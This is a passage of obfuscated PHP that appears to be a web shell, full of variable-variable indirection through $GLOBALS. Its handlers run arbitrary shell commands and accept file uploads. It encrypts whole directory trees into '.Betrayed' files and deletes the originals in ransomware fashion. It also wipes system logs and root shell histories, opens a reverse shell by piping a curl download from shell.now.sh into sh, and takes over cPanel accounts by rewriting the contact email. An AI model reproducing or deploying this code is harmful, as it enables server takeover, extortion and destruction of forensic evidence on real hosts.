1509. echo "\n" . getcwd();
1510. } elseif (function_exists("shell_exec")) {
1511. $ {
1512. $ {
1513. "GLOBALS"
1514. }
1515. ["out"]
1516. } = shell_exec($ {
1517. $ {
1518. "GLOBALS"
1519. }
1520. ["ex"]
1521. });
1522. echo $ {
1523. $ {
1524. "GLOBALS"
1525. }
1526. ["out"]
1527. };
1528. echo "\n" . getcwd();
1529. } elseif (function_exists("exec")) {
1530. $ {
1531. $ {
1532. "GLOBALS"
1533. }
1534. ["new"]
1535. } = exec($ {
1536. $ {
1537. "GLOBALS"
1538. }
1539. ["ex"]
1540. });
1541. echo $ {
1542. $ {
1543. "GLOBALS"
1544. }
1545. ["new"]
1546. };
1547. echo "\n" . getcwd();
1548. } elseif (function_exists("passthru")) {
1549. echo passthru($ {
1550. $ {
1551. "GLOBALS"
1552. }
1553. ["ex"]
1554. });
1555. echo "\n" . getcwd();
1556. }
1557. }
1558. }
1559. function enc($key, $lol) {
1560. if ($ {
1561. $ {
1562. "GLOBALS"
1563. }
1564. ["lol"]
1565. } != (__FILE__)) {
1566. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
1567. $ {
1568. $ {
1569. "GLOBALS"
1570. }
1571. ["dir_path"]
1572. } = dirname(__FILE__) . "\\";
1573. } else {
1574. $ {
1575. $ {
1576. "GLOBALS"
1577. }
1578. ["dir_path"]
1579. } = dirname(__FILE__) . "/";
1580. }
1581. $ {
1582. $ {
1583. "GLOBALS"
1584. }
1585. ["path_file"]
1586. } = pathinfo(__FILE__);
1587. $ {
1588. $ {
1589. "GLOBALS"
1590. }
1591. ["path_file"]
1592. } = $ {
1593. $ {
1594. "GLOBALS"
1595. }
1596. ["dir_path"]
1597. } . $ {
1598. $ {
1599. "GLOBALS"
1600. }
1601. ["path_file"]
1602. }
1603. ['basename'];
1604. $ {
1605. $ {
1606. "GLOBALS"
1607. }
1608. ["path_info"]
1609. } = pathinfo($ {
1610. $ {
1611. "GLOBALS"
1612. }
1613. ["lol"]
1614. });
1615. if (isset($ {
1616. $ {
1617. "GLOBALS"
1618. }
1619. ["path_info"]
1620. }
1621. ["extension"]) && $ {
1622. $ {
1623. "GLOBALS"
1624. }
1625. ["path_info"]
1626. }
1627. ["extension"] == "Betrayed") {
1628. echo "Already encrypted > " . $ {
1629. $ {
1630. "GLOBALS"
1631. }
1632. ["lol"]
1633. } . "\n";
1634. } else {
1635. if ($ {
1636. $ {
1637. "GLOBALS"
1638. }
1639. ["lol"]
1640. } != $ {
1641. $ {
1642. "GLOBALS"
1643. }
1644. ["path_file"]
1645. }) {
1646. AES_CBC::encryptFile($ {
1647. $ {
1648. "GLOBALS"
1649. }
1650. ["key"]
1651. }, $ {
1652. $ {
1653. "GLOBALS"
1654. }
1655. ["lol"]
1656. }, $ {
1657. $ {
1658. "GLOBALS"
1659. }
1660. ["lol"]
1661. } . ".Betrayed");
1662. unlink($ {
1663. $ {
1664. "GLOBALS"
1665. }
1666. ["lol"]
1667. }) or die("Couldn't delete file");
1668. echo "Betrayed > " . $ {
1669. $ {
1670. "GLOBALS"
1671. }
1672. ["lol"]
1673. } . "\n";
1674. } else {
1675. echo "Lovely me > " . $ {
1676. $ {
1677. "GLOBALS"
1678. }
1679. ["lol"]
1680. };
1681. }
1682. }
1683. }
1684. }
1685. function decryz($key, $lol) {
1686. if ($ {
1687. $ {
1688. "GLOBALS"
1689. }
1690. ["lol"]
1691. } != (__FILE__)) {
1692. $ {
1693. $ {
1694. "GLOBALS"
1695. }
1696. ["path_info"]
1697. } = pathinfo($ {
1698. $ {
1699. "GLOBALS"
1700. }
1701. ["lol"]
1702. });
1703. if (isset($ {
1704. $ {
1705. "GLOBALS"
1706. }
1707. ["path_info"]
1708. }
1709. ["extension"]) && $ {
1710. $ {
1711. "GLOBALS"
1712. }
1713. ["path_info"]
1714. }
1715. ["extension"] == "Betrayed") {
1716. $ {
1717. $ {
1718. "GLOBALS"
1719. }
1720. ["out"]
1721. } = substr($ {
1722. $ {
1723. "GLOBALS"
1724. }
1725. ["lol"]
1726. }, 0, -9);
1727. AES_CBC::decryptFile($ {
1728. $ {
1729. "GLOBALS"
1730. }
1731. ["key"]
1732. }, $ {
1733. $ {
1734. "GLOBALS"
1735. }
1736. ["lol"]
1737. }, $ {
1738. $ {
1739. "GLOBALS"
1740. }
1741. ["out"]
1742. });
1743. unlink($ {
1744. $ {
1745. "GLOBALS"
1746. }
1747. ["lol"]
1748. }) or die("Couldn't delete file");
1749. echo "Decrypted > " . $ {
1750. $ {
1751. "GLOBALS"
1752. }
1753. ["lol"]
1754. } . "\n";
1755. } else {
1756. }
1757. }
1758. }
1759. if (isset($ {
1760. $ {
1761. "GLOBALS"
1762. }
1763. ["_FILES"]
1764. }
1765. ["file"]) && isset($ {
1766. $ {
1767. "GLOBALS"
1768. }
1769. ["_SESSION"]
1770. }
1771. ["auth"])) {
1772. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
1773. $ {
1774. $ {
1775. "GLOBALS"
1776. }
1777. ["target_path"]
1778. } = dirname(__FILE__) . "\\";
1779. } else {
1780. $ {
1781. $ {
1782. "GLOBALS"
1783. }
1784. ["target_path"]
1785. } = dirname(__FILE__) . "/";
1786. }
1787. $ {
1788. $ {
1789. "GLOBALS"
1790. }
1791. ["target_path"]
1792. } = $ {
1793. $ {
1794. "GLOBALS"
1795. }
1796. ["target_path"]
1797. } . basename($ {
1798. $ {
1799. "GLOBALS"
1800. }
1801. ["_FILES"]
1802. }
1803. ['file']['name']);
1804. if (move_uploaded_file($ {
1805. $ {
1806. "GLOBALS"
1807. }
1808. ["_FILES"]
1809. }
1810. ['file']['tmp_name'], $ {
1811. $ {
1812. "GLOBALS"
1813. }
1814. ["target_path"]
1815. })) {
1816. echo "File uploaded successfully here >>> " . $ {
1817. $ {
1818. "GLOBALS"
1819. }
1820. ["target_path"]
1821. };
1822. echo "\n" . getcwd();
1823. } else {
1824. echo "Sorry, file not uploaded, please try again!";
1825. echo "\n" . getcwd();
1826. }
1827. }
1828. function encx($secret_key, $dir) {
1829. foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($ {
1830. $ {
1831. "GLOBALS"
1832. }
1833. ["dir"]
1834. }, RecursiveDirectoryIterator::SKIP_DOTS)) as $ {
1835. $ {
1836. "GLOBALS"
1837. }
1838. ["filename"]
1839. }) {
1840. enc($ {
1841. $ {
1842. "GLOBALS"
1843. }
1844. ["secret_key"]
1845. }, $ {
1846. $ {
1847. "GLOBALS"
1848. }
1849. ["filename"]
1850. });
1851. }
1852. }
1853. function dcry($secret_key, $dir) {
1854. foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($ {
1855. $ {
1856. "GLOBALS"
1857. }
1858. ["dir"]
1859. }, RecursiveDirectoryIterator::SKIP_DOTS)) as $ {
1860. $ {
1861. "GLOBALS"
1862. }
1863. ["filename"]
1864. }) {
1865. decryz($ {
1866. $ {
1867. "GLOBALS"
1868. }
1869. ["secret_key"]
1870. }, $ {
1871. $ {
1872. "GLOBALS"
1873. }
1874. ["filename"]
1875. });
1876. }
1877. }
1878. function funk($dir) {
1879. foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($ {
1880. $ {
1881. "GLOBALS"
1882. }
1883. ["dir"]
1884. }, RecursiveDirectoryIterator::SKIP_DOTS)) as $ {
1885. $ {
1886. "GLOBALS"
1887. }
1888. ["filename"]
1889. }) {
1890. try {
1891. unlink($ {
1892. $ {
1893. "GLOBALS"
1894. }
1895. ["filename"]
1896. }) or die("Couldn't delete file");
1897. echo "Fucked> " . $ {
1898. $ {
1899. "GLOBALS"
1900. }
1901. ["filename"]
1902. };
1903. }
1904. catch(Exception $e) {
1905. echo "Permission denial" . $filename;
1906. }
1907. }
1908. }
1909. $ {
1910. $ {
1911. "GLOBALS"
1912. }
1913. ["log"]
1914. } = array("/var/log/yum.log", "/var/log/wtmp", "/var/log/utmp", "/var/log/secure", "/var/log/mysqld.log", "/var/log/boot.log", "/var/log/lighttpd", "/var/log/httpd/", "/var/log/qmail/", "/var/log/maillog", "/var/log/cron.log", "/var/log/kern.log", "/var/log/auth.log", "/var/log/message", "/var/log/lastlog‬‬", "/var/adm/lastlog‬‬", "/‪usr/adm/lastlog‬‬", "/var/log/lastlog", "/etc/utmp", "/etc/wtmp", "/var/adm", "/var/log", "/var/logs", "/var/run/utmp", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/root/.bash_logout", "/root/.bash_history", "/root/.ksh_history", "/tmp/logs", "/opt/lampp/logs/access_log", "/var/log/nginx/access.log", "/logs/agent_lo", "/logs/referer_log", "/logs/access_log", "/var/log/apache2", "/var/log/wtmp", "/tmp/logs", "/root/.bash_history", "/root/.ksh_history", "/root/.bash_logout", "/usr/local/apache/logs", "/usr/local/apache/log", "/var/apache/logs", "/var/apache/log", "/var/run/utmp", "/var/logs", "/var/log", "/var/adm", "/etc/wtmp", "/etc/utmp", "/var/log/lastlog", "/var/log/wtmp",);
1915. if (isset($ {
1916. $ {
1917. "GLOBALS"
1918. }
1919. ["_POST"]
1920. }
1921. ["logfucked"]) && isset($ {
1922. $ {
1923. "GLOBALS"
1924. }
1925. ["_SESSION"]
1926. }
1927. ["auth"])) {
1928. clearerror();
1929. try {
1930. system("find /home -name 'access_log' -exec rm {} \;");
1931. }
1932. catch(Exception $e) {
1933. echo $e;
1934. }
1935. foreach ($ {
1936. $ {
1937. "GLOBALS"
1938. }
1939. ["log"]
1940. } as $ {
1941. $ {
1942. "GLOBALS"
1943. }
1944. ["lf"]
1945. }) {
1946. if (file_exists($ {
1947. $ {
1948. "GLOBALS"
1949. }
1950. ["lf"]
1951. })) {
1952. try {
1953. unlink($ {
1954. $ {
1955. "GLOBALS"
1956. }
1957. ["lf"]
1958. }) or die(" access denied! for " . $ {
1959. $ {
1960. "GLOBALS"
1961. }
1962. ["lf"]
1963. });
1964. echo "Fucked> " . $ {
1965. $ {
1966. "GLOBALS"
1967. }
1968. ["lf"]
1969. } . "\n";
1970. }
1971. catch(Exception $e) {
1972. echo $e;
1973. }
1974. } elseif (is_dir($ {
1975. $ {
1976. "GLOBALS"
1977. }
1978. ["lf"]
1979. })) {
1980. try {
1981. rmdir($ {
1982. $ {
1983. "GLOBALS"
1984. }
1985. ["lf"]
1986. });
1987. echo "Fucked> " . $ {
1988. $ {
1989. "GLOBALS"
1990. }
1991. ["lf"]
1992. } . "\n";
1993. }
1994. catch(Exception $e) {
1995. echo $e;
1996. }
1997. }
1998. }
1999. }
2000. if (isset($ {
2001. $ {
2002. "GLOBALS"
2003. }
2004. ["_POST"]
2005. }
2006. ["ip"]) && isset($ {
2007. $ {
2008. "GLOBALS"
2009. }
2010. ["_POST"]
2011. }
2012. ["port"]) && isset($ {
2013. $ {
2014. "GLOBALS"
2015. }
2016. ["_SESSION"]
2017. }
2018. ["auth"])) {
2019. $ {
2020. $ {
2021. "GLOBALS"
2022. }
2023. ["ipx"]
2024. } = str_replace("\n", "", $ {
2025. $ {
2026. "GLOBALS"
2027. }
2028. ["_POST"]
2029. }
2030. ["ip"]);
2031. $ {
2032. $ {
2033. "GLOBALS"
2034. }
2035. ["port"]
2036. } = str_replace("\n", "", $ {
2037. $ {
2038. "GLOBALS"
2039. }
2040. ["_POST"]
2041. }
2042. ["port"]);
2043. chechx("curl https://shell.now.sh/" . $ {
2044. $ {
2045. "GLOBALS"
2046. }
2047. ["ipx"]
2048. } . ":" . $ {
2049. $ {
2050. "GLOBALS"
2051. }
2052. ["port"]
2053. } . " | sh");
2054. }
2055. if (isset($ {
2056. $ {
2057. "GLOBALS"
2058. }
2059. ["_POST"]
2060. }
2061. ["creckcpanel"]) && isset($ {
2062. $ {
2063. "GLOBALS"
2064. }
2065. ["_SESSION"]
2066. }
2067. ["auth"])) {
2068. checkcreckcpanel();
2069. system("find .my.cnf");
2070. }
2071. function checkcreckcpanel() {
2072. try {
2073. $ {
2074. $ {
2075. "GLOBALS"
2076. }
2077. ["paap"]
2078. } = "/" . "home" . "/" . get_current_user() . "/";
2079. echo ("current email used in cpanel > ");
2080. echo file_get_contents($ {
2081. $ {
2082. "GLOBALS"
2083. }
2084. ["paap"]
2085. } . ".contactemail");
2086. $ {
2087. $ {
2088. "GLOBALS"
2089. }
2090. ["locky"]
2091. } = $ {
2092. $ {
2093. "GLOBALS"
2094. }
2095. ["paap"]
2096. } . ".cpanel/contactinfo";
2097. if (file_exists($ {
2098. $ {
2099. "GLOBALS"
2100. }
2101. ["locky"]
2102. })) {
2103. unlink($ {
2104. $ {
2105. "GLOBALS"
2106. }
2107. ["locky"]
2108. }) or die(" access denied! for " . $ {
2109. $ {
2110. "GLOBALS"
2111. }
2112. ["locky"]
2113. });
2114. }
2115. echo "\nThis website Cpanel can Be crecked Type creckzee \n";
2116. }
2117. catch(Exception $e) {
2118. echo "Cpanel can't be creck " . $e;
2119. }
2120. }
2121. if (isset($ {
2122. $ {
2123. "GLOBALS"
2124. }
2125. ["_POST"]
2126. }
2127. ["creckzee"]) && isset($ {
2128. $ {
2129. "GLOBALS"
2130. }
2131. ["_SESSION"]
2132. }
2133. ["auth"])) {
2134. $ {
2135. $ {
2136. "GLOBALS"
2137. }
2138. ["em"]
2139. } = $ {
2140. $ {
2141. "GLOBALS"
2142. }
2143. ["_POST"]
2144. }
2145. ["creckzee"];
2146. $ {
2147. $ {
2148. "GLOBALS"
2149. }
2150. ["me"]
2151. } = str_replace("\n", "", $ {
2152. $ {
2153. "GLOBALS"
2154. }
2155. ["em"]
2156. });
2157. creckzee($ {
2158. $ {
2159. "GLOBALS"
2160. }
2161. ["me"]
2162. });
2163. }
2164. function creckzee($email) {
2165. try {
2166. $ {
2167. $ {
2168. "GLOBALS"
2169. }
2170. ["paap"]
2171. } = "/" . "home" . "/" . get_current_user() . "/";
2172. echo file_get_contents($ {
2173. $ {
2174. "GLOBALS"
2175. }
2176. ["paap"]
2177. } . ".contactemail");
2178. $ {
2179. $ {
2180. "GLOBALS"
2181. }
2182. ["file"]
2183. } = fopen($ {
2184. $ {
2185. "GLOBALS"
2186. }
2187. ["paap"]
2188. } . ".contactemail", "w");
2189. fwrite($ {
2190. $ {
2191. "GLOBALS"
2192. }
2193. ["file"]
2194. }, $ {
2195. $ {
2196. "GLOBALS"
2197. }
2198. ["email"]
2199. });
2200. fclose($ {
2201. $ {
2202. "GLOBALS"
2203. }
2204. ["file"]
2205. });
2206. $ {
2207. $ {
2208. "GLOBALS"
2209. }
2210. ["locky"]
2211. } = $ {
2212. $ {
2213. "GLOBALS"
2214. }
2215. ["paap"]
2216. } . ".cpanel/contactinfo";
2217. if (file_exists($ {
2218. $ {
2219. "GLOBALS"
2220. }
2221. ["locky"]
2222. })) {
2223. unlink($ {
2224. $ {
2225. "GLOBALS"
2226. }
2227. ["locky"]
2228. }) or die(" access denied! for " . $ {
2229. $ {
2230. "GLOBALS"
2231. }
2232. ["locky"]
2233. });
2234. }
2235. echo "\nEnter your password in password reset field and reset the password :) ";
2236. }
2237. catch(Exception $e) {
2238. echo $e;
2239. }
2240. }
2241. class AES_CBC {
2242. protected static $KEY_SIZES = array('AES-128' => 16, 'AES-192' => 24, 'AES-256' => 32);
2243. protected static function key_size() {
2244. return self::$ {
2245. $ {
2246. "GLOBALS"
2247. }
2248. ["KEY_SIZES"]
2249. }
2250. ['AES-128'];
2251. }
2252. public static function encryptFile($password, $input_stream, $aes_filename) {
2253. $ {
2254. $ {
2255. "GLOBALS"
2256. }
2257. ["iv_size"]
2258. } = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
2259. $ {
2260. $ {
2261. "GLOBALS"
2262. }
2263. ["fin"]
2264. } = fopen($ {
2265. $ {
2266. "GLOBALS"
2267. }
2268. ["input_stream"]
2269. }, "rb");
2270. $ {
2271. $ {
2272. "GLOBALS"
2273. }
2274. ["fc"]
2275. } = fopen($ {
2276. $ {
2277. "GLOBALS"
2278. }
2279. ["aes_filename"]
2280. }, "wb+");
2281. if (!empty($ {
2282. $ {
2283. "GLOBALS"
2284. }
2285. ["fin"]
2286. }) && !empty($ {
2287. $ {
2288. "GLOBALS"
2289. }
2290. ["fc"]
2291. })) {
2292. fwrite($ {
2293. $ {
2294. "GLOBALS"
2295. }
2296. ["fc"]
2297. }, str_repeat("_", 32));
2298. fwrite($ {
2299. $ {
2300. "GLOBALS"
2301. }
2302. ["fc"]
2303. }, $ {
2304. $ {
2305. "GLOBALS"
2306. }
2307. ["hmac_salt"]
2308. } = mcrypt_create_iv($ {
2309. $ {
2310. "GLOBALS"
2311. }
2312. ["iv_size"]
2313. }, MCRYPT_DEV_URANDOM));
2314. fwrite($ {
2315. $ {
2316. "GLOBALS"
2317. }
2318. ["fc"]
2319. }, $ {
2320. $ {
2321. "GLOBALS"
2322. }
2323. ["esalt"]
2324. } = mcrypt_create_iv($ {
2325. $ {
2326. "GLOBALS"
2327. }
2328. ["iv_size"]
2329. }, MCRYPT_DEV_URANDOM));
2330. fwrite($ {
2331. $ {
2332. "GLOBALS"
2333. }
2334. ["fc"]
2335. }, $ {
2336. $ {
2337. "GLOBALS"
2338. }
2339. ["iv"]
2340. } = mcrypt_create_iv($ {
2341. $ {
2342. "GLOBALS"
2343. }
2344. ["iv_size"]
2345. }, MCRYPT_DEV_URANDOM));
2346. $ {
2347. $ {
2348. "GLOBALS"
2349. }
2350. ["ekey"]
2351. } = hash_pbkdf2("sha256", $ {
2352. $ {
2353. "GLOBALS"
2354. }
2355. ["password"]
2356. }, $ {
2357. $ {
2358. "GLOBALS"
2359. }
2360. ["esalt"]
2361. }, $ {
2362. $ {
2363. "GLOBALS"
2364. }
2365. ["it"]
2366. } = 1000, self::key_size(), $ {
2367. $ {
2368. "GLOBALS"
2369. }
2370. ["raw"]
2371. } = true);
2372. $ {
2373. $ {
2374. "GLOBALS"
2375. }
2376. ["opts"]
2377. } = array('mode' => 'cbc', 'iv' => $ {
2378. $ {
2379. "GLOBALS"
2380. }
2381. ["iv"]
2382. }, 'key' => $ {
2383. $ {
2384. "GLOBALS"
2385. }
2386. ["ekey"]
2387. });
2388. stream_filter_append($ {
2389. $ {
2390. "GLOBALS"
2391. }
2392. ["fc"]
2393. }, 'mcrypt.rijndael-128', STREAM_FILTER_WRITE, $ {
2394. $ {
2395. "GLOBALS"
2396. }
2397. ["opts"]
2398. });
2399. $ {
2400. $ {
2401. "GLOBALS"
2402. }
2403. ["tnbj_lhaaumcpstixsbmpwcgrhozddnxy_kcgv"]
2404. } = 0;
2405. while (!feof($ {
2406. $ {
2407. "GLOBALS"
2408. }
2409. ["fin"]
2410. })) {
2411. $ {
2412. $ {
2413. "GLOBALS"
2414. }
2415. ["block"]
2416. } = fread($ {
2417. $ {
2418. "GLOBALS"
2419. }
2420. ["fin"]
2421. }, 8192);
2422. $ {
2423. $ {
2424. "GLOBALS"
2425. }
2426. ["tnbj_lhaaumcpstixsbmpwcgrhozddnxy_kcgv"]
2427. }+= strlen($ {
2428. $ {
2429. "GLOBALS"
2430. }
2431. ["block"]
2432. });
2433. fwrite($ {
2434. $ {
2435. "GLOBALS"
2436. }
2437. ["fc"]
2438. }, $ {
2439. $ {
2440. "GLOBALS"
2441. }
2442. ["block"]
2443. });
2444. }
2445. $ {
2446. $ {
2447. "GLOBALS"
2448. }
2449. ["block_size"]
2450. } = mcrypt_get_block_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
2451. $ {
2452. $ {
2453. "GLOBALS"
2454. }
2455. ["padding"]
2456. } = $ {
2457. $ {
2458. "GLOBALS"
2459. }
2460. ["block_size"]
2461. } - ($ {
2462. $ {
2463. "GLOBALS"
2464. }
2465. ["tnbj_lhaaumcpstixsbmpwcgrhozddnxy_kcgv"]
2466. } % $ {
2467. $ {
2468. "GLOBALS"
2469. }
2470. ["block_size"]
2471. });
2472. fwrite($ {
2473. $ {
2474. "GLOBALS"
2475. }
2476. ["fc"]
2477. }, str_repeat(chr($ {
2478. $ {
2479. "GLOBALS"
2480. }
2481. ["padding"]
2482. }), $ {
2483. $ {
2484. "GLOBALS"
2485. }
2486. ["padding"]
2487. }));
2488. fclose($ {
2489. $ {
2490. "GLOBALS"
2491. }
2492. ["fin"]
2493. });
2494. fclose($ {
2495. $ {
2496. "GLOBALS"
2497. }
2498. ["fc"]
2499. });
2500. $ {
2501. $ {
2502. "GLOBALS"
2503. }
2504. ["hmac_raw"]
2505. } = self::calculate_hmac_after_32bytes($ {
2506. $ {
2507. "GLOBALS"
2508. }
2509. ["password"]
2510. }, $ {
2511. $ {
2512. "GLOBALS"
2513. }
2514. ["hmac_salt"]
2515. }, $ {
2516. $ {
2517. "GLOBALS"
2518. }
2519. ["aes_filename"]
2520. });
2521. $ {
2522. $ {
2523. "GLOBALS"
2524. }
2525. ["fc"]
2526. } = fopen($ {
2527. $ {
2528. "GLOBALS"
2529. }
2530. ["aes_filename"]
2531. }, "rb+");
2532. fwrite($ {
2533. $ {
2534. "GLOBALS"
2535. }
2536. ["fc"]
2537. }, $ {
2538. $ {
2539. "GLOBALS"
2540. }
2541. ["hmac_raw"]
2542. });
2543. fclose($ {
2544. $ {
2545. "GLOBALS"
2546. }
2547. ["fc"]
2548. });
2549. }
2550. }
2551. public static function decryptFile($password, $aes_filename, $out_stream) {
2552. $ {
2553. $ {
2554. "GLOBALS"
2555. }
2556. ["iv_size"]
2557. } = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
2558. $ {
2559. $ {
2560. "GLOBALS"
2561. }
2562. ["hmac_raw"]
2563. } = file_get_contents($ {
2564. $ {
2565. "GLOBALS"
2566. }
2567. ["aes_filename"]
2568. }, false, NULL, 0, 32);
2569. $ {
2570. $ {
2571. "GLOBALS"
2572. }
2573. ["hmac_salt"]
2574. } = file_get_contents($ {
2575. $ {
2576. "GLOBALS"
2577. }
2578. ["aes_filename"]
2579. }, false, NULL, 32, $ {
2580. $ {
2581. "GLOBALS"
2582. }
2583. ["iv_size"]
2584. });
2585. $ {
2586. $ {
2587. "GLOBALS"
2588. }
2589. ["hmac_calc"]
2590. } = self::calculate_hmac_after_32bytes($ {
2591. $ {
2592. "GLOBALS"
2593. }
2594. ["password"]
2595. }, $ {
2596. $ {
2597. "GLOBALS"
2598. }
2599. ["hmac_salt"]
2600. }, $ {
2601. $ {
2602. "GLOBALS"
2603. }
2604. ["aes_filename"]
2605. });
2606. $ {
2607. $ {
2608. "GLOBALS"
2609. }
2610. ["fc"]
2611. } = fopen($ {
2612. $ {
2613. "GLOBALS"
2614. }
2615. ["aes_filename"]
2616. }, "rb");
2617. $ {
2618. $ {
2619. "GLOBALS"
2620. }
2621. ["fout"]
2622. } = fopen($ {
2623. $ {
2624. "GLOBALS"
2625. }
2626. ["out_stream"]
2627. }, 'wb');
2628. if (!empty($ {
2629. $ {
2630. "GLOBALS"
2631. }
2632. ["fout"]
2633. }) && !empty($ {
2634. $ {
2635. "GLOBALS"
2636. }
2637. ["fc"]
2638. }) && self::hash_equals($ {
2639. $ {
2640. "GLOBALS"
2641. }
2642. ["hmac_raw"]
2643. }, $ {
2644. $ {
2645. "GLOBALS"
2646. }
2647. ["hmac_calc"]
2648. })) {
2649. fread($ {
2650. $ {
2651. "GLOBALS"
2652. }
2653. ["fc"]
2654. }, 32 + $ {
2655. $ {
2656. "GLOBALS"
2657. }
2658. ["iv_size"]
2659. });
2660. $ {
2661. $ {
2662. "GLOBALS"
2663. }
2664. ["esalt"]
2665. } = fread($ {
2666. $ {
2667. "GLOBALS"
2668. }
2669. ["fc"]
2670. }, $ {
2671. $ {
2672. "GLOBALS"
2673. }
2674. ["iv_size"]
2675. });
2676. $ {
2677. $ {
2678. "GLOBALS"
2679. }
2680. ["iv"]
2681. } = fread($ {
2682. $ {
2683. "GLOBALS"
2684. }
2685. ["fc"]
2686. }, $ {
2687. $ {
2688. "GLOBALS"
2689. }
2690. ["iv_size"]
2691. });
2692. $ {
2693. $ {
2694. "GLOBALS"
2695. }
2696. ["ekey"]
2697. } = hash_pbkdf2("sha256", $ {
2698. $ {
2699. "GLOBALS"
2700. }
2701. ["password"]
2702. }, $ {
2703. $ {
2704. "GLOBALS"
2705. }
2706. ["esalt"]
2707. }, $ {
2708. $ {
2709. "GLOBALS"
2710. }
2711. ["it"]
2712. } = 1000, self::key_size(), $ {
2713. $ {
2714. "GLOBALS"
2715. }
2716. ["raw"]
2717. } = true);
2718. $ {
2719. $ {
2720. "GLOBALS"
2721. }
2722. ["opts"]
2723. } = array('mode' => 'cbc', 'iv' => $ {
2724. $ {
2725. "GLOBALS"
2726. }
2727. ["iv"]
2728. }, 'key' => $ {
2729. $ {
2730. "GLOBALS"
2731. }
2732. ["ekey"]
2733. });
2734. stream_filter_append($ {
2735. $ {
2736. "GLOBALS"
2737. }
2738. ["fc"]
2739. }, 'mdecrypt.rijndael-128', STREAM_FILTER_READ, $ {
2740. $ {
2741. "GLOBALS"
2742. }
2743. ["opts"]
2744. });
2745. while (!feof($ {
2746. $ {
2747. "GLOBALS"
2748. }
2749. ["fc"]
2750. })) {
2751. $ {
2752. $ {
2753. "GLOBALS"
2754. }
2755. ["block"]
2756. } = fread($ {
2757. $ {
2758. "GLOBALS"
2759. }
2760. ["fc"]
2761. }, 8192);
2762. if (feof($ {
2763. $ {
2764. "GLOBALS"
2765. }
2766. ["fc"]
2767. })) {
2768. $ {
2769. $ {
2770. "GLOBALS"
2771. }
2772. ["padding"]
2773. } = ord($ {
2774. $ {
2775. "GLOBALS"
2776. }
2777. ["block"]
2778. }
2779. [strlen($ {
2780. $ {
2781. "GLOBALS"
2782. }
2783. ["block"]
2784. }) - 1]);
2785. $ {
2786. $ {
2787. "GLOBALS"
2788. }
2789. ["block"]
2790. } = substr($ {
2791. $ {
2792. "GLOBALS"
2793. }
2794. ["block"]
2795. }, 0, 0 - $ {
2796. $ {
2797. "GLOBALS"
2798. }
2799. ["padding"]
2800. });
2801. }
2802. fwrite($ {
2803. $ {
2804. "GLOBALS"
2805. }
2806. ["fout"]
2807. }, $ {
2808. $ {
2809. "GLOBALS"
2810. }
2811. ["block"]
2812. });
2813. }
2814. fclose($ {
2815. $ {
2816. "GLOBALS"
2817. }
2818. ["fout"]
2819. });
2820. fclose($ {
2821. $ {
2822. "GLOBALS"
2823. }
2824. ["fc"]
2825. });
2826. }
2827. }
2828. private static function hash_equals($str1, $str2) {
2829. if (strlen($ {
2830. $ {
2831. "GLOBALS"
2832. }
2833. ["str1"]
2834. }) == strlen($ {
2835. $ {
2836. "GLOBALS"
2837. }
2838. ["str2"]
2839. })) {
2840. $ {
2841. $ {
2842. "GLOBALS"
2843. }
2844. ["res"]
2845. } = $ {
2846. $ {
2847. "GLOBALS"
2848. }
2849. ["str1"]
2850. } ^ $ {
2851. $ {
2852. "GLOBALS"
2853. }
2854. ["str2"]
2855. };
2856. for ($ {
2857. $ {
2858. "GLOBALS"
2859. }
2860. ["ret"]
2861. } = 0, $ {
2862. $ {
2863. "GLOBALS"
2864. }
2865. ["i"]
2866. } = strlen($ {
2867. $ {
2868. "GLOBALS"
2869. }
2870. ["res"]
2871. }) - 1;$ {
2872. $ {
2873. "GLOBALS"
2874. }
2875. ["i"]
2876. } >= 0;$ {
2877. $ {
2878. "GLOBALS"
2879. }
2880. ["i"]
2881. }
2882. --) $ {
2883. $ {
2884. "GLOBALS"
2885. }
2886. ["ret"]
2887. }|= ord($ {
2888. $ {
2889. "GLOBALS"
2890. }
2891. ["res"]
2892. }
2893. [$ {
2894. $ {
2895. "GLOBALS"
2896. }
2897. ["i"]
2898. }
2899. ]);
2900. return !$ {
2901. $ {
2902. "GLOBALS"
2903. }
2904. ["ret"]
2905. };
2906. }
2907. return false;
2908. }
2909. private static function calculate_hmac_after_32bytes($password, $hsalt, $filename) {
2910. static $init = 0;
2911. $ {
2912. $ {
2913. "GLOBALS"
2914. }
2915. ["init"]
2916. } or $ {
2917. $ {
2918. "GLOBALS"
2919. }
2920. ["init"]
2921. } = stream_filter_register("user-filter.skipfirst32bytes", "FileSkip32Bytes");
2922. $ {
2923. $ {
2924. "GLOBALS"
2925. }
2926. ["stream"]
2927. } = "php://filter/read=user-filter.skipfirst32bytes/resource=" . $ {
2928. $ {
2929. "GLOBALS"
2930. }
2931. ["filename"]
2932. };
2933. $ {
2934. $ {
2935. "GLOBALS"
2936. }
2937. ["hkey"]
2938. } = hash_pbkdf2("sha256", $ {
2939. $ {
2940. "GLOBALS"
2941. }
2942. ["password"]
2943. }, $ {
2944. $ {
2945. "GLOBALS"
2946. }
2947. ["hsalt"]
2948. }, $ {
2949. $ {
2950. "GLOBALS"
2951. }
2952. ["iterations"]
2953. } = 1000, 24, $ {
2954. $ {
2955. "GLOBALS"
2956. }
2957. ["raw"]
2958. } = true);
2959. return hash_hmac_file('sha256', $ {
2960. $ {
2961. "GLOBALS"
2962. }
2963. ["stream"]
2964. }, $ {
2965. $ {
2966. "GLOBALS"
2967. }
2968. ["hkey"]
2969. }, $ {
2970. $ {
2971. "GLOBALS"
2972. }
2973. ["raw"]
2974. } = true);
2975. }
2976. }
2977. class FileSkip32Bytes extends php_user_filter {
2978. private $skipped = 0;
2979. function filter($in, $out, &$consumed, $closing) {
2980. while ($ {
2981. $ {
2982. "GLOBALS"
2983. }
2984. ["bucket"]
2985. } = stream_bucket_make_writeable($ {
2986. $ {
2987. "GLOBALS"
2988. }
2989. ["in"]
2990. })) {
2991. $ {
2992. $ {
2993. "GLOBALS"
2994. }
2995. ["outlen"]
2996. } = $ {
2997. $ {
2998. "GLOBALS"
2999. }
3000. ["bucket"]
3001. }->{"datalen"};
